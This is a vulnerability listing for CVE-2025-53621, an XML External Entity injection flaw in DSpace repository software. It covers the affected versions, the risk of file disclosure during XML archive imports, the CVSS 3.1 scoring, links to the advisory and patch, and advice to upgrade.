XML External Entity Injection Vulnerability in DSpace Repository Software
CVE-2025-53621

6.9MEDIUM

Key Information:

Vendor: Dspace
Status: Dspace
Vendor: CVE Published:; 15 July 2025

What is CVE-2025-53621?

The DSpace repository software has a vulnerability that allows XML External Entity (XXE) injection due to the failure to disable external entities during XML parsing. This affects all versions prior to 7.6.4, 8.2, and 9.1. When XML files are imported, whether via command-line or user interface, these entities could lead to connections to malicious sites or local file read access by the Tomcat user. Sensitive data such as server configurations or files may be exposed, posing a significant risk if untrusted DSpace administrators unintentionally import malicious data. To mitigate this risk, immediate upgrading to a patched version is advised, or alternatively, implementing manual patches and best practices to assess SAF archives thoroughly.

Affected Version(s)

DSpace < 7.6.4 < 7.6.4

DSpace >= 8.0, < 8.2 < 8.0, 8.2

DSpace >= 9.0, < 9.1 < 9.0, 9.1

References

https://github.com/DSpace/DSpace/security/advisories/GHSA...

x_refsource_CONFIRM

https://github.com/DSpace/DSpace/pull/11032

x_refsource_MISC

https://github.com/DSpace/DSpace/pull/11032.patch

x_refsource_MISC

CVSS V3.1

Score:

6.9

Severity:

MEDIUM

Confidentiality:

High

Integrity:

None

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

High

User Interaction:

Required

Scope:

Changed

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jul 15, 2025
Vulnerability Reserved
Jul 7, 2025

Dspace

What is CVE-2025-53621?

Affected Version(s)

References

CVSS V3.1

Timeline